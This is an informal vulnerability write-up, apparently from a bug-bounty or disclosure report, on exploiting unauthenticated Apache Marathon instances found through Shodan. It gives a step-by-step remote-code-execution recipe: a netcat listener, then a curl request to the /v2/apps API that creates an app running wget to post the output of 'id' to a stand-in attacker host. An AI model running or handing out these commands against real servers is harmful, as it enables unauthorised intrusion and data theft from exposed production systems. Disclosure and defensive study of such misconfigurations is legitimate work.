Description and Impact

Marathon is a production-grade container orchestration platform for Mesosphere’s Datacenter Operating System (DC/OS) and Apache Mesos. So, since Marathon is a orchestration platform for mesos, that means that you can schedule tasks to be performed whatever you want, per example a simple bash command (pretty similar to cronjobs)

Steps To Reproduce

One day I just was navigating in shodan and I don’t know why I thinked about the Marathon service (As devops engineer, in one of my activties I needed to set up some Marathon/Mesos/Spark instances), that made think about which companies have Marathon intances activated without any authentication in production environments, so I decided to try with some dorks in shodan (like “ssl:Redacted” “X-Marathon-Leader”) when suddendly some wild server appear:

I thinked WOW! Marathon instances with HTTP/1.1 200 OK responses, it is not a guarantee, but 90% of the times, a 200 response on Marathon UI means that you have access without any kind of authentication needed

Extracted from the Report

1. Go to https://XXX.XXX.XXX.XXX/ui/#/apps and see the Marathon’s Dashboard and the application list (without any authentication needed):

2. Then set your own server listening with netcat with the following command:
#set your own server to wait the response
root@h0st:~# nc -lvvv 55555

3. Then create a Marathon application that will be execute the RCE command with the following curl command:

# create a marathon application that will be execute any command that you want (in this case is /usr/bin/wget --user-agent=marathon-id --post-data=`id`)
# replace attacker_server with your listening server that you set up with netcat and the "rce-id" tag with your own custom tag, this is the Marathon application name
curl -sk -X POST -H "Content-type: application/json" https://XXX.XXX.XXX.XXX/v2/apps -d '{ "mem": 16, "id": "rce-id", "cmd": "/usr/bin/wget --user-agent=marathon-id --post-data=`id` attacker_server:55555"}'

4. Then go to https://XXX.XXX.XXX.XXX/ui/#/apps again and see the application created named “rce-id” that we just created with curl, and wait some seconds and recieve the command from the Marathon Instance and the command output

Thanks to #Pwned 0day security / Security executions code & #VulnerabilityLabs

next time.... im tired